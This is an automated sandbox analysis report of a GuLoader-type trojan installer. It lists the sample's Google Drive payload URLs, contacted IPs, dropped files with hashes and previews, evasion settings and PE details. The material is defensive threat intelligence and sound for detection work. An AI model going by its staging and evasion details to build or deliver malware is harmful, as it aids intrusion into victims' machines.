                                    https://drive.usercontent.google.com/SfTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1563473880.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1674532367.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1563404234.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.google.comJfTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      216.58.206.78
                                      		drive.google.comUnited States
                                      		15169GOOGLEUSfalse
                                      142.250.185.97
                                      		drive.usercontent.google.comUnited States
                                      		15169GOOGLEUSfalse

                                      General Information

                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1587610
                                      Start date and time:2025-01-10 15:45:21 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 40s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Run name:Run with higher sleep bypass
                                      Number of analysed new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:fTSt7dc60O.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:2eaf30511cb438075facb1d59f944a6ddedf3aa5c2620e0916a150f5415983bb.exe
                                      Detection:MAL
                                      Classification:mal68.troj.evad.winEXE@3/10@2/2
                                      EGA Information:
                                      • Successful, ratio: 50%
                                      HCA Information:
                                      • Successful, ratio: 90%
                                      • Number of executed functions: 48
                                      • Number of non-executed functions: 74
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target fTSt7dc60O.exe, PID 8092 because there are no executed function
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASNs

                                      No context

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      37f463bf4616ecd445d4a1937da06e19vq6jxdGvD6.exeGet hashmaliciousGuLoaderBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      Ub46mg9pn4.exeGet hashmaliciousGuLoaderBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      nRNzqQOQwk.exeGet hashmaliciousGuLoaderBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      You7ynHizy.exeGet hashmaliciousGuLoaderBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      Xjz8dblHDe.exeGet hashmaliciousGuLoaderBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      zrNcqxZRSM.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      CY SEC AUDIT PLAN 2025.docx.docGet hashmaliciousUnknownBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dllME-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                        09-FD-94.03.60.175.07.xlsx.exeGet hashmaliciousGuLoaderBrowse
                                          TEC-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                            ME-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                              09-FD-94.03.60.175.07.xlsx.exeGet hashmaliciousGuLoaderBrowse
                                                TEC-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                  Purchase-Order27112024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    563299efce875400a8d9b44b96597c8e-sample (1).zipGet hashmaliciousUnknownBrowse
                                                      debit-note-19-08-dn-2024.exeGet hashmaliciousGuLoaderBrowse

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\BooConf.ini

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):45
                                                        Entropy (8bit):4.7748605961854445
                                                        Encrypted:false
                                                        SSDEEP:3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
                                                        MD5:8B9FC0443D7E48145E2D4B37AFB2D37B
                                                        SHA1:64A5718A478A38AC262D2E46DA81D0E88C122A0F
                                                        SHA-256:4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
                                                        SHA-512:5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..

                                                        C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11776
                                                        Entropy (8bit):5.656006343879828
                                                        Encrypted:false
                                                        SSDEEP:192:eP24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlbSl:T8QIl975eXqlWBrz7YLOlb
                                                        MD5:3E6BF00B3AC976122F982AE2AADB1C51
                                                        SHA1:CAAB188F7FDC84D3FDCB2922EDEEB5ED576BD31D
                                                        SHA-256:4FF9B2678D698677C5D9732678F9CF53F17290E09D053691AAC4CC6E6F595CBE
                                                        SHA-512:1286F05E6A7E6B691F6E479638E7179897598E171B52EB3A3DC0E830415251069D29416B6D1FFC6D7DCE8DA5625E1479BE06DB9B7179E7776659C5C1AD6AA706
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: ME-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                        • Filename: 09-FD-94.03.60.175.07.xlsx.exe, Detection: malicious, Browse
                                                        • Filename: TEC-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                        • Filename: ME-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                        • Filename: 09-FD-94.03.60.175.07.xlsx.exe, Detection: malicious, Browse
                                                        • Filename: TEC-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                        • Filename: Purchase-Order27112024.scr.exe, Detection: malicious, Browse
                                                        • Filename: 563299efce875400a8d9b44b96597c8e-sample (1).zip, Detection: malicious, Browse
                                                        • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                        Reputation:moderate, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....n3T...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\nsmE73.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1217498
                                                        Entropy (8bit):3.427451882823274
                                                        Encrypted:false
                                                        SSDEEP:6144:fP7xZKjyqa1PPe9DvJ4usQC5ZQR9dzrDG4Eu/Oi9g9p0AJ2aJ4aKh:fP7x2y91u9vJCQC/QTdS48XoPh
                                                        MD5:1AFBA10167DB501871718FBB45009140
                                                        SHA1:A299CE179AEA09CB1A26E3CC024CC4CEC13A8C45
                                                        SHA-256:C778E9D379CCF47CCF6BC317BE52D78BDCDE1FB9CC7D5718D3EAD96EA46D46AC
                                                        SHA-512:44C9E6396620CEA8DF3EA340B408DA126007B4AE162CC5F37C2C763FE3F010F3A58DC1761255ED74501FF45A7D6A9ACB43091B9A0ACB0E719C2C51B9867B76A2
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:r.......,...................[...................r...........................................................................................................................................................................................................................................G...J...........k...j...........................................................................................................................................3...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmc.ini

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):28
                                                        Entropy (8bit):4.110577243331642
                                                        Encrypted:false
                                                        SSDEEP:3:iGAeTUHvn:lAeTUHv
                                                        MD5:F6A80CF0B011E1638B38D8EAA2A9629B
                                                        SHA1:30AB7FEEC5D0A304ED9908ADD562601E3E7118C3
                                                        SHA-256:AB3B162F39F8FDBD8DD767791EC116E75DA198FCE6BABBA6E1677044678714D8
                                                        SHA-512:E1EC33696EA5086DEA0A52B577442B96124B71CD09999637185D114B7E5F313D455560C350F5A02FBA83C5A3A12A5234EEC995D0AF0CBF64471B3887E2AA2ED8
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:[Access]..Setting=Disabled..

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Contiguousness.Rit

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):309738
                                                        Entropy (8bit):7.516382939689266
                                                        Encrypted:false
                                                        SSDEEP:6144:yZKjyqa1PPe9DvJ4usQC5ZQR9dzrDG4Eu/O9:y2y91u9vJCQC/QTdS489
                                                        MD5:C2E2BE2ACF5991EC7009DDC5D8B361DF
                                                        SHA1:FC1C8390F2BA0E997B7AD4AD30CFBBF1B181B695
                                                        SHA-256:E3738968906D3EDADA7CD870CCEB2882FED2FEFA0610B8AE063E9F8457F2A118
                                                        SHA-512:5C103560D7948C5208C54401E2C20B1066D8DE27F63BBD73FCA28DD52AA44780B8F8F9A02D1F0039F0792630E1CE99B3BF09ADE271540543D95D63ABABDDC7B4
                                                        Malicious:false
                                                        Preview:...OOO.~...RRR.............FFF......FF.vv................VV...........s..............DDD.............99......__....``...................ww.t....7.{..%%.Q.....``.......................>...........UU..........[..PPPPPP.......=====...EE.Y.p......................k....ooo..............................Q.................%%................................P................_.h.......a.. .<.....a........\.......KKKK.....,..55..................'.......................#..........H....hhh.............ss.g.nn.JJJ..............#.........222..........[[[................C..................................N.q...q.........,,,,,............^..........W......z...p.......................9........................,,,,,,.0..KK.......^^....................NN....................@@@@.@@.&&.LL....!!!..............EEE............2222.........``....0.......YY.'.!............................#..................xx.........C.9.....................<<<........//...,....,,........E....99............HH.....................mm

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Havrnes117.For

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):27357
                                                        Entropy (8bit):4.575459332843998
                                                        Encrypted:false
                                                        SSDEEP:768:67lqhYoAunEaZqOMl7D28MUQ7iM5DFTmD:6M2oznsJn0UQ7/5DFK
                                                        MD5:91B75B6174DE619A40B45FB2247B3AFD
                                                        SHA1:F9126CD2CC8244372E46F31C81C46932E083EE2F
                                                        SHA-256:EA87B1D2A30A008F82A07E61A71B936521D74FC0818AAA7E364CC99A2198608C
                                                        SHA-512:41BDD3F1941B419184E685A548E97AAFDFFE411D122176F5AD931CCB933CD4A8A784F842DE1A46BF4082222968A5679F8A6B92C74E6BE26BE3BE0B20C56F84E4
                                                        Malicious:false
                                                        Preview:............**......ZZ......... ..x.........f........````.....................}}}....~.Y....ff.............._.............~~~.ZZZ................qqq............S......IIII......................i......U.......................pppp..............CCC.......PP...^......[..................... ...//............cc..........._.K.........00.......,,,,,,,,,,..............333.......zz....I..............8..u..........11.............................F......... .....--...........EEE.................F.666.............................................HH.............]....|.....................;;;...........tttt..............XX..................Q........OOOOO.............LL...nn....XX.....X.......dd..............I.r..............MM...................8........<<.P.........._.q....))......::.H...'.................................>>>>>..............T..............].......{{...NNN...............9.....SSS.......(.pp.......................Y..3.................00....PP..<.......bb.................%%%%.r......d...

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Impieties200.bjr

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):207998
                                                        Entropy (8bit):1.2479248406208852
                                                        Encrypted:false
                                                        SSDEEP:768:tCENokMNjB1phztRILF3znwMWQZeRdtDL7xIC8GI82e/2awZ6aXmpeNhLvkoVtOX:e03p6cf0/e9ReE8H
                                                        MD5:5C283F56F45AD89C5D82538EA09AC0F5
                                                        SHA1:FA3736CF43F5841B9D4E28FF2024C17897EEF745
                                                        SHA-256:D53EE062B5FA4EB7DED4A658B37B70DD6E90A581AF5BDE713169971AE249F605
                                                        SHA-512:2B2516707050C5DFB7A8D9E151DEE98EDD44B59B08E0F19D301F80BFDE89129F47EC6079AC1E26F6D8C60AAFE2931A4D2BC720BEDD8149477810B0C8F558AD0A
                                                        Malicious:false
                                                        Preview:..(.................>............................................................................................................8....dq......................`..-..............................................g..........s...............................................................................................................................b...RE.b.........................................................................w..........................................................................................%............................P..........]...............:.........B..........................................4.......................................................................n...............................................................o................4..................y...9........#......................m.....z...........................................................K.....D..............m...........................>...................?.....................k.....

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\firsaarsfdselsdags.luv

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):443489
                                                        Entropy (8bit):1.2463028275519636
                                                        Encrypted:false
                                                        SSDEEP:768:0B5HMEmj1BG+VGKVbkxUNjTj4Yl+ieTSrPb/1aKigAurLC2DVyTaL7B8IHBxCoxa:0kFoC4xKmYKV1tmGJJt0a+sWH0
                                                        MD5:913964ACDFFFA24344A401D48E08C653
                                                        SHA1:EE1E0AC79DA12D6439F9DF5B865347647473642A
                                                        SHA-256:B3A4E2499F6A793497BAB8F5B6CC38462FD70F955308596ACFFF03D11F2F6ED4
                                                        SHA-512:2AEBEB7DFFACF4150CCF6ED91EF5501B129331E5A2A4A465FC542562C52907FDA3990F7BE5F17B60854DE7FD34E6E2E873ED8C0DE6788964894890F69A9F261C
                                                        Malicious:false
                                                        Preview:..9............................................................2...................A.....................................................7...........................................................................g.......m..........................v.z.........9.........................K....................................................................................%...................:....................................................h...(... ..........]......]...........................-......................................................f......2.................d..........C...........................9.........._.....................L.......................................v..........................J...................\....................|........................&......'....N.....................................o............................8.....................................................................................................n...................................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\portitor.win

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):209062
                                                        Entropy (8bit):1.2469617066336303
                                                        Encrypted:false
                                                        SSDEEP:768:aq+yDnL4aSptsfjJcMBkQnTum3yc5rUGLJTLAP6zp2R5O73XKymSRQoWgqVB7L+v:T7c811jBM9Y1qeu30oHw
                                                        MD5:607886D87859E45164D2959809AB5367
                                                        SHA1:4E86EB72512D4C9BE32304E3A12B499D6A86084B
                                                        SHA-256:A05695DF251298ED2F35E2DFA2C4CF44D5BACCC391615FACD34FA6411BB43217
                                                        SHA-512:A767C56234A265E17FE3D05A1218D628419E3B750E7D55DD5E2D57A847DBF7B72E10270A1D9D14D39D62BCEF38818DE54168AF87C2DE59FDBF503F0C382DA5DE
                                                        Malicious:false
                                                        Preview:...............................................i........A........5............................b.t....!......................J.........................&................../Z.........................................................|........................T......^.................8...................D...............:..q......g.......................................................{........................p.................................................|..............B......`..............................0...............................o.......................N.......................f........................p............^.............................................................................+..A......................k........@...........................()......g..................U...................d.......................f...............].LF...................................................................}.._............................8......................................7..

                                                        C:\Users\user\subacidity.lnk

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                        Category:dropped
                                                        Size (bytes):890
                                                        Entropy (8bit):3.509885893426518
                                                        Encrypted:false
                                                        SSDEEP:12:8wl0c0a/ledp8wXuQUlbq/JMRPbdpYmHbqjMR/j7MJsW+slmYalzJCN85v4t2YZ2:8QudO/9Q6jd9a6/My3Nr24qy
                                                        MD5:BE3C01E9CDCFE186EC4005EB1D001E46
                                                        SHA1:E690BEC843BF6E0D9D85CC6BAA4739EF1C96CF76
                                                        SHA-256:CA5312803583128405A426FBE1AEAE9400C6EB87BDADBCE852921191FFB1C7BC
                                                        SHA-512:5B23CA2113A8E33CE5D90C55D388F7DA93736E6988DBB99D9D0AEA9B98305511E3A8D40D8A135F1D80F6FC6B8A4A10D53BAB96A095A24A761D8EEB2AAA808172
                                                        Malicious:false
                                                        Preview:L..................F........................................................q....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.....b.2...........cutline.sil.H............................................c.u.t.l.i.n.e...s.i.l.......2.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.c.u.t.l.i.n.e...s.i.l.E.C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.t.y.p.h.l.o.s.t.o.m.y.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.887380640693706
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:fTSt7dc60O.exe
                                                        File size:540'745 bytes
                                                        MD5:0eecc852b848039da55141fb43dd01e2
                                                        SHA1:9f1f57db9890e515dd132bc7d1157ef1a2ff0cad
                                                        SHA256:2eaf30511cb438075facb1d59f944a6ddedf3aa5c2620e0916a150f5415983bb
                                                        SHA512:74bb690253ce11bc69e783b1b12561678fb71470f42ee15a5280719503bfe6866693973e52022c26cb2a08616d53a7eeb2973c3763aeb1c9618c7cdf1529a5b5
                                                        SSDEEP:12288:XRV78GLIlIYtQ5viB2XZptlrmp/jcnVCyd0ZjfMjhixmCGs7:IplJtQ5aBsl2jQoyd0Zj0sxzGs7
                                                        TLSH:01B42304BCC2EC1EC58A5DF14BB6C6BAB17AFE26691025876F713E5F2C60BC1407D286
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....n3T.................`...*......Z3.......p....@

                                                        File Icon

                                                        Icon Hash:0714262e34390f06

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x40335a
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x54336EB4 [Tue Oct 7 04:40:20 2014 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:e221f4f7d36469d53810a4b5f9fc8966

                                                        Entrypoint Preview

                                                        Instruction
                                                        sub esp, 000002D8h
                                                        push ebx
                                                        push ebp
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        xor ebp, ebp
                                                        pop esi
                                                        mov dword ptr [esp+18h], ebp
                                                        mov dword ptr [esp+10h], 00409230h
                                                        mov dword ptr [esp+14h], ebp
                                                        call dword ptr [00407034h]
                                                        push 00008001h
                                                        call dword ptr [004070BCh]
                                                        push ebp
                                                        call dword ptr [004072ACh]
                                                        push 00000009h
                                                        mov dword ptr [004292B8h], eax
                                                        call 00007F673492355Ah
                                                        mov dword ptr [00429204h], eax
                                                        push ebp
                                                        lea eax, dword ptr [esp+38h]
                                                        push 000002B4h
                                                        push eax
                                                        push ebp
                                                        push 004206A8h
                                                        call dword ptr [0040717Ch]
                                                        push 0040937Ch
                                                        push 00428200h
                                                        call 00007F67349231C5h
                                                        call dword ptr [00407134h]
                                                        mov ebx, 00434000h
                                                        push eax
                                                        push ebx
                                                        call 00007F67349231B3h
                                                        push ebp
                                                        call dword ptr [0040710Ch]
                                                        push 00000022h
                                                        mov dword ptr [00429200h], eax
                                                        pop edi
                                                        mov eax, ebx
                                                        cmp word ptr [00434000h], di
                                                        jne 00007F6734920649h
                                                        mov esi, edi
                                                        mov eax, 00434002h
                                                        push esi
                                                        push eax
                                                        call 00007F6734922C03h
                                                        push eax
                                                        call dword ptr [00407240h]
                                                        mov ecx, eax
                                                        mov dword ptr [esp+1Ch], ecx
                                                        jmp 00007F673492073Bh
                                                        push 00000020h
                                                        pop edx
                                                        cmp ax, dx
                                                        jne 00007F6734920649h
                                                        inc ecx
                                                        inc ecx
                                                        cmp word ptr [ecx], dx

                                                        Rich Headers

                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x132d8.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x5ec60x600060ec0c4d80dd6821cdaced6135eddfd5False0.6593424479166666data6.438901783265187IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0x90000x202f80x60099cdd6cde9adee6bf3b24ee817b4574bFalse0.4830729166666667data3.8340327961758165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata0x2a0000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x4a0000x132d80x134006a5bbc33287fc34c026c3652aab40ca4False0.7685800527597403data6.977243320980138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0x4a4480xb1b3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9923501351915763
                                                        RT_ICON0x556000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4311203319502075
                                                        RT_ICON0x57ba80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.48053470919324576
                                                        RT_ICON0x58c500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5330490405117271
                                                        RT_ICON0x59af80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5647540983606557
                                                        RT_ICON0x5a4800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6353790613718412
                                                        RT_ICON0x5ad280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.5961981566820277
                                                        RT_ICON0x5b3f00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3176829268292683
                                                        RT_ICON0x5ba580x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.42124277456647397
                                                        RT_ICON0x5bfc00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6453900709219859
                                                        RT_ICON0x5c4280x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.4274193548387097
                                                        RT_ICON0x5c7100x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4651639344262295
                                                        RT_ICON0x5c8f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5067567567567568
                                                        RT_DIALOG0x5ca200x100dataEnglishUnited States0.5234375
